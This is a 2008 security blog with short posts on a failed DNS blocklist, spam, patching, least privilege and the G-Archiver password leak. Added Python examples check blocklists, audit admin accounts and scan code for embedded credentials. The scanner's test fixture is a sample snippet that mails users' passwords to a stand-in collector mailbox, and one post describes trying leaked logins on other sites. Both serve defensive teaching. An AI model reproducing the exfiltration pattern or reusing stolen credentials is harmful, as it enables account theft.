Monday, March 31, 2008

ORDB Gone bad?

I received an email this morning from a colleague giving me a heads up that ORDB queries are returning everything as an open relay.

According to the WHOIS information the domain has been registered since June 2001, was last updated in January 2007, and currently expires in June 2016.

I'm wondering whether the DNS information was changed to get people to stop using their site, or whether it was hacked by spammers to stop people from trusting open relay type services.

So if you're having problems sending or receiving mail, as always check your configs, and in this case remove ORDB from your list of open relay databases, as it ceased operating in December 2006.

-- Tim Krabec
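A check that catches the failure mode described above, as an added example (not from the original post): a DNSBL zone that has been abandoned or wildcarded answers "listed" for every name, so a mail server should probe the RFC 5782 test points (127.0.0.1 must never be listed, 127.0.0.2 must always be listed) before trusting the zone. The zone name `dnsbl.example` and the three resolver functions are assumptions that let the example run offline; `live_lookup` uses the system resolver if you want to probe a real zone.

```python
"""Sanity-check a DNS-based blocklist (DNSBL) before acting on its answers.

Added example. Per RFC 5782 a working IPv4 DNSBL must NOT list 127.0.0.1 and
MUST list 127.0.0.2. A zone that has been abandoned and wildcarded (every
lookup answers positive) fails the first probe, so the mail server can stop
consulting it instead of rejecting all inbound mail.
"""
import socket

# Hypothetical zone name for this example; not a real blocklist.
EXAMPLE_ZONE = "dnsbl.example"


def dnsbl_name(ip, zone):
    """Build the DNSBL query name: octets reversed, zone appended."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError("not an IPv4 address: %r" % ip)
    return ".".join(reversed(octets)) + "." + zone


def live_lookup(name):
    """Resolve with the system resolver; None means NXDOMAIN (not listed)."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def is_listed(ip, zone, resolver=live_lookup):
    """A DNSBL signals 'listed' by answering with an A record (usually 127.0.0.x)."""
    return resolver(dnsbl_name(ip, zone)) is not None


def zone_health(zone, resolver=live_lookup):
    """'ok', 'lists-everything' (the ORDB failure mode) or 'dead' (no answers)."""
    if is_listed("127.0.0.1", zone, resolver):
        return "lists-everything"
    if not is_listed("127.0.0.2", zone, resolver):
        return "dead"
    return "ok"


def check_sender(ip, zone, resolver=live_lookup):
    """Consult the zone only if it passes its health check; a broken zone
    fails open (sender treated as not listed) rather than blocking all mail."""
    if zone_health(zone, resolver) != "ok":
        return False
    return is_listed(ip, zone, resolver)


# --- constructed resolvers so the example runs without network access ---

def healthy_resolver(name):
    """Behaves like a maintained zone: test point 127.0.0.2 and one bad host listed."""
    listed = {dnsbl_name("127.0.0.2", EXAMPLE_ZONE), dnsbl_name("192.0.2.10", EXAMPLE_ZONE)}
    return "127.0.0.2" if name in listed else None


def wildcarded_resolver(name):
    """Behaves like the failure mode: any name under the zone resolves."""
    return "127.0.0.2" if name.endswith("." + EXAMPLE_ZONE) else None


def dead_resolver(name):
    """Behaves like a zone that no longer answers anything."""
    return None


if __name__ == "__main__":
    for label, r in (("healthy", healthy_resolver),
                     ("wildcarded", wildcarded_resolver),
                     ("dead", dead_resolver)):
        print(label, zone_health(EXAMPLE_ZONE, r),
              check_sender("192.0.2.10", EXAMPLE_ZONE, r))
```

In a real MTA you would cache the health result per zone for a few minutes rather than sending two extra probes for every message, and log a change of state so someone notices when a list goes bad.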

Friday, March 28, 2008

the HoneySpam project is now live

I would like to thank Subdriven & Panaman from the IRC channel for volunteering to help with this project.

The basic goal is to find out why people click on links in spam and develop better training. I started this project less than 24 hours ago (at time of posting) and I am pleased to have others showing interest. Stay tuned.

-- Tim Krabec

Thursday, March 27, 2008

No Patch for Human Stupidity

Sender: Not recognized
Subject: Nonsense
Body: Link only

Pop Quiz:
A. Click the link
B. Delete the Message
C. Send it to Spam
D. Adjust the Spam filters on the server

If you picked anything but A you are smarter than Bob's co-worker.

What makes people do stuff like this? Why? Would they walk up to a building in a strange neighborhood, open the door and walk in, just because? Are these the same people who go to the wrong address and wonder why the people they are looking for are not there?

Well, to answer those questions I got the brilliant idea to start a new Honey project. Coming soon. I envision this project as a collection point for surveys where fake spam is sent to co-workers or clients to find out why people are clicking on links in spam, so that we can develop better methods of training.

-- Tim Krabec

Wednesday, March 26, 2008

"Having the talk" now means 2 things
Having children used to mean having "the talk" about the birds and the bees; now there is a second talk you should have, about posting things on the internet. You can have the exact same problem with employees and their blogging or online activities. When you have this talk it should not just be about you, your job, the company, or the law; it should concern what can happen to your child or employee. You need to arm them with knowledge and explain the consequences of their actions. While it is important to realize that people have differences of opinion, it is also important for both sides to realize that they both may have a seat at the table. Whether it is your child or an employee who has a problem with an action the company is taking, both can have devastating effects on you, the company, the employee or the child.
Having open lines of communication can help you either defuse a situation or properly prepare for what is coming. Take the example of a company clearing some land for a new building. The company may have great plans for this location but be too blinded by its vision to realize that it is not taking into account the natural beauty of the site, its historic significance, or its natural value. By talking to family, friends and employees it may realize that by changing its plans it can avoid negative publicity or the alienation of its employees. We probably do not need to discuss how not allowing a child or an employee to express their views on a topic can backfire.

With that said, it is certainly inappropriate for an employee or a child to release damaging information (whistleblowing aside) just because they disagree. And it is definitely illegal for an employee to release IP or other proprietary information that a company has. I'm not sure about the legality of a child releasing proprietary information, but I'm pretty sure that allowing the child to gain that information is probably the same as releasing it to others. So it is imperative that you talk to the appropriate people, and discuss business only with those you are supposed to be discussing it with.

-- Tim Krabec

Tuesday, March 25, 2008

Just write the patch, we'll decide if it is critical

According to Computerworld, "Microsoft Corp.'s security team today acknowledged that it knew of bugs in its Jet Database Engine as far back as 2005 but did not patch the problems because it thought it had blocked the obvious attack vectors." Mitigation of threats happens on the front lines, by IT in the trenches. Firewalls and IPS/IDS are all mitigation; software and hardware vendors need to actually fix the problem, not mitigate it, at least not as a long-term fix.

IMHO patches should be as numerous as press releases, if not more so. Patches should be painless to install across 1 or 1 million machines, and should not require a reboot. If there is a critical issue that needs to be patched, involve a trusted community where mitigation can be developed while you (the vendor) write and test the patch.

A single patch to fix a single issue may not be the most prudent or timely solution. Take the case where a quick patch fixes the problem on a large number of machines, does nothing on a small number, and in rare cases crashes the service. In that case, release the patch, document where it works and where it does not, allow it to be deployed where it works, and fix the rest quickly. In the case of a network worm that spreads very rapidly, I'd rather see a patch released hours after the worm was discovered that immunizes 35%+ of systems than a patch that is 99%+ effective weeks later.

-- Tim Krabec

Monday, March 24, 2008

The FBI can listen to you via your phone when it is off?

I seriously believe/hope that there are some facts wrong in that report. I can understand that the microphone can be turned on when the phone is on but not in an active call. But unless the phone is in some kind of sleep/hibernation mode I seriously doubt that the microphone could be activated remotely, unless it was programmed or designed to do so.

-- Tim Krabec

Sizing people up

With people being an important part of any company, you need some tips on sizing up your employees, vendors and customers. When I read the following article I realized that there were many ideas that would not just face my wife and me when our kids start dating (some sooner than later) but also affect business on a day-to-day basis.

Extending the concepts in the article: is the person dressed appropriately for their line of work? Did a high-priced contractor come dressed appropriately, or did they literally drop everything to help you out in an emergency? How about their demeanor or their vehicle? Does that bargain-basement company's employee show up in a flashy vehicle? Have you done background checks on the employee or checked references? Is the business listed with the local BBB? Have you called the references provided or, better yet, found references of your own?

-- Tim Krabec

Saturday, March 22, 2008

Least privilege

It is easier to start with full restrictions and allow escalation as needed than to start with full privileges and take them away. As an experiment, you can give free coffee away at the office, noting that it is for a "limited time", but when the time comes people will still expect the free coffee. Compare that to providing coffee on special occasions, or occasionally as needed. The same concept applies to access to files and rights on a PC. If people can install any program they want or access any web site they want, and you then restrict their access in any manner, they will most likely view it as you taking a right away from them.

You need to create policies that set expectations for business security and get ownership or buy-in from the employees. Give them training on computer security where there is WIIFM (what's in it for me) and where the training is something they can use at home. Provide both a carrot and a stick. Make sure the wording is positive rather than negative: "restricting the user privileges on your machine makes it tougher for spyware to spread or even get installed in the first place" rather than "we're taking away administrator/power user rights for security".

Set an appropriate time to set up the new privileges and make it happen. Hiring a new computer company, or using your existing company to do an analysis or some basic reporting on your systems, can show where the deficiencies exist. After a virus or spyware outbreak is a perfect time to review your current plan and implement something new, especially if users were adversely affected during the outbreak. Make sure IT is not seen as the cause of things being taken away, and that they are not seen as the "bad guys" in your organization.

-- Tim Krabec
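The "basic reporting on your systems" that shows where the deficiencies exist, as an added example that is not part of the original post: capture the output of `net localgroup Administrators` from each workstation, parse the member list, and report every account holding local admin rights that is not on an approved list. The host names, account names and the approved set below are hypothetical, and the captured text is constructed to mirror the real command's layout.

```python
"""Find workstations whose local Administrators group still holds accounts
outside an approved set, from captured 'net localgroup Administrators' output.

Added example. The command output below is constructed to mirror the real
command's layout; the host names, accounts and approved set are hypothetical.
"""

# Accounts allowed to hold local admin rights (compared case-insensitively).
APPROVED_ADMINS = {"administrator", "corp\\desktop-support", "corp\\domain admins"}

# Constructed: {hostname: text captured from 'net localgroup Administrators'}
SAMPLE_OUTPUT = {
    "WS-ACCT-01": """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
CORP\\Desktop-Support
CORP\\Domain Admins
CORP\\bsmith
The command completed successfully.
""",
    "WS-ENG-03": """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
CORP\\Desktop-Support
CORP\\Domain Admins
CORP\\jdoe
WS-ENG-03\\localtech
The command completed successfully.
""",
    "WS-RECEP-02": """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
CORP\\Desktop-Support
CORP\\Domain Admins
The command completed successfully.
""",
}


def parse_members(output):
    """Return the member names listed between the dashed rule and the trailer."""
    members = set()
    in_list = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("----"):
            in_list = True
            continue
        if line.startswith("The command completed"):
            break
        if in_list and line:
            members.add(line.lower())
    return members


def unapproved_admins(outputs, approved=APPROVED_ADMINS):
    """{host: sorted unapproved members} for hosts with at least one deviation."""
    report = {}
    for host, text in outputs.items():
        extra = parse_members(text) - approved
        if extra:
            report[host] = sorted(extra)
    return report


def by_account(outputs, approved=APPROVED_ADMINS):
    """Invert the report: {account: sorted hosts}, to spot users who are admin everywhere."""
    accounts = {}
    for host, extras in unapproved_admins(outputs, approved).items():
        for acct in extras:
            accounts.setdefault(acct, []).append(host)
    return {acct: sorted(hosts) for acct, hosts in accounts.items()}


if __name__ == "__main__":
    for host, extras in sorted(unapproved_admins(SAMPLE_OUTPUT).items()):
        print("%s: unapproved local admins: %s" % (host, ", ".join(extras)))
```

The per-account view is the one to bring to the meeting with management: a single user who is admin on one box is a ticket, an account that is admin on every box is a policy problem, and the local-only account (`localtech` above) is the kind of thing nobody remembers creating.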

Thursday, March 20, 2008

In other news

I have been elected Vice President of the South Florida Chapter of the ISSA.

-- Tim Krabec

Sunday, March 16, 2008

Why do they need this?

When filling out forms for anything from joining a web site to registering software to opening a credit card to taking an "anonymous" survey, we are asked many questions: when were you born, how old are you, what is your sex, are you married, do you own or rent, what is your sign, what is your highest level of education, how many kids, what is your race, your religion, your nationality, your driver's license, etc. I have to wonder why I need to give this information out; I know several people who lie on the demographic information. I've been ignoring all information that is not required. But the question is, why is this being collected?

Businesses need to ask themselves: what type of information do we collect, and why? How long do we keep it? How is the information used, and what would happen if it were stolen? The last litmus test I would add is: do I want this information collected, and probably sold?

I'm not sure what information, if any, beyond name, address, phone number, advertising method, sales volume and computer stats I want to keep about my customers. I also think I'm going to maintain an active list, a hold list, and finally a purge list. The only other information I'm going to maintain is a list of customers who do not wish to have email or mail sent to them.

-- Tim Krabec

Would you use Ritalin for a headache?

Probably not. Each drug has its own purpose, and so do the different "anti-" applications. Anti-virus programs such as AVG, Avast, Symantec and McAfee are all good at removing viruses, but are simply not effective at removing spyware, Trojans, or adware unless those happen to function like viruses. Just as getting rid of athlete's foot requires different medicine than controlling ADHD, and getting rid of a bacterial infection requires different medicine again.
Removing different types of malware (viruses, spyware, adware and Trojans) requires different kinds of software. Much like Ritalin, anti-virus and anti-spyware should be used all the time, while other programs can be used on an as-needed basis. Some programs need only be run occasionally or when suspicious activity is found.

-- Tim Krabec

Tuesday, March 11, 2008

My 1st podcast.

I would like to thank Martin McKeay and Rich Mogull for allowing me to be a guest on their Network Security Podcast (episode 97). It was weird being involved in a podcast that I have listened to over the past year or so, since it sounds like I am listening to an episode until they ask, "And Tim, what do you have to say about..."

-- Tim Krabec

Monday, March 10, 2008

It's my computer... I will install any program I want to.

Brief: the program G-Archiver mails the username and password of every person who uses it to a specific Gmail address, and to make matters worse the username and password of the account that everybody's information was sent to were also in the code.

There has been some discussion about the intentions of the programmer, whether it was accidental or malicious; I'm hoping it was accidental. With that said, it does not change the fact that the usernames and passwords of at least 1,777 users of this program, and their Gmail accounts, were potentially compromised. There are two lessons I would like to bring to people's attention here:

1. Use a different password on every site you visit, or at the least use a group of passwords: one or two for throw-away registrations (local newspapers, national papers, other sites you would not give personal/private information to), and then a separate password for each banking site, financial institution, or shopping site. If I came across a set of usernames and passwords I would search the web for those usernames on various forums, MySpace, Facebook, etc. and then try several of those combinations.

2. It is important that you know what programs you have on your computer, and that if you have an IT department or a computer guy/gal they know what programs you have installed. Also, when your resident IT/computer guy/gal tells you, or asks you, not to install an application, it is generally not because they are being mean; they are trying to keep your data and your computer safe.

-- Tim Krabec
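What the "computer guy/gal" can actually look for before approving a program whose source is available, as an added example that is not part of the original post and is not G-Archiver's code: a small scanner that flags string constants with secret-looking names, logins whose username and password both resolve to literals in the code (the exact anti-pattern described above), and literal mail host names that show where data would be sent. `SAMPLE_SOURCE` is a constructed snippet reproducing the pattern; every name, address and host in it is made up.

```python
"""Flag hard-coded credentials and embedded mail-account logins in a program's
source before letting it onto a workstation.

Added example. SAMPLE_SOURCE is a constructed snippet that reproduces the
pattern described above (a collector mailbox whose login is embedded in the
code); it is not G-Archiver's code, and every name and host in it is made up.
"""
import re

# name = "literal"   (optional trailing comment)
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(["\'])(.*?)\2\s*(#.*)?$')
# identifiers that usually hold secrets
SECRET_NAME = re.compile(r'(?i)(pass(word|wd)?|pwd|secret|token|api[_-]?key)')
# obj.login(arg1, arg2)  -- smtplib/imaplib/poplib style
LOGIN_CALL = re.compile(r'\.login\(\s*([^,()]+?)\s*,\s*([^,()]+?)\s*\)')
# a literal mail host name
MAIL_HOST = re.compile(r'(?i)\b(?:smtp|mail|imap|pop3?)\.[a-z0-9.-]+\.[a-z]{2,}\b')

# Constructed sample, not real code: the collector account and its password
# are embedded, and every user's credentials are mailed to it.
SAMPLE_SOURCE = '''\
import smtplib

COLLECT_ADDR = "collector@example.com"
COLLECT_PASS = "s3cr3t-collector-pass"

def backup(user, password):
    srv = smtplib.SMTP("smtp.example.com", 587)
    srv.login(COLLECT_ADDR, COLLECT_PASS)
    srv.sendmail(COLLECT_ADDR, COLLECT_ADDR,
                 "user=%s pass=%s" % (user, password))
'''


def _literal_or_constant(token, constants):
    """Resolve a call argument to a string: quoted literal or a known constant."""
    token = token.strip()
    if len(token) >= 2 and token[0] in "\"'" and token[-1] == token[0]:
        return token[1:-1]
    return constants.get(token)  # None for runtime values (parameters, input)


def scan(source):
    """Return sorted (line, kind, detail) findings. Passwords are never echoed."""
    lines = source.splitlines()
    constants = {}
    findings = []
    # pass 1: collect string constants, flag secret-looking names
    for no, line in enumerate(lines, 1):
        m = ASSIGN.match(line)
        if m:
            name, value = m.group(1), m.group(3)
            constants[name] = value
            if SECRET_NAME.search(name):
                findings.append((no, "hardcoded-secret", name))
    # pass 2: logins whose user AND password both resolve to literals, plus mail hosts
    for no, line in enumerate(lines, 1):
        for host in MAIL_HOST.findall(line):
            findings.append((no, "outbound-mail-host", host.lower()))
        m = LOGIN_CALL.search(line)
        if m:
            user = _literal_or_constant(m.group(1), constants)
            pw = _literal_or_constant(m.group(2), constants)
            if user is not None and pw is not None:
                findings.append((no, "embedded-login", user))
    return sorted(findings)


if __name__ == "__main__":
    for no, kind, detail in scan(SAMPLE_SOURCE):
        print("line %d: %s (%s)" % (no, kind, detail))
```

A login that uses runtime values (`s.login(user, password)`) is not flagged, because that is what a legitimate mail client does; the finding is the combination of an embedded account, its embedded password, and a fixed destination, which is what turns a backup tool into a credential collector. For a closed-source program the same questions are answered with a packet capture or an outbound firewall rule instead.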

Monday, March 3, 2008

The Admin, Bean Counter & Manager

It was a quiet day at work when The Admin read of a new threat poised to wreak havoc on networks worldwide. Being a good admin, she spent some time researching the threat and proposing a solution, with full redundancy. She then scheduled a meeting with her manager and the bean counter. The bean counter immediately requested that the system be cut to its bare minimum; The Manager, happy that a solution exists, recommended not doing anything until it becomes necessary.

Sound familiar?

-- Tim Krabec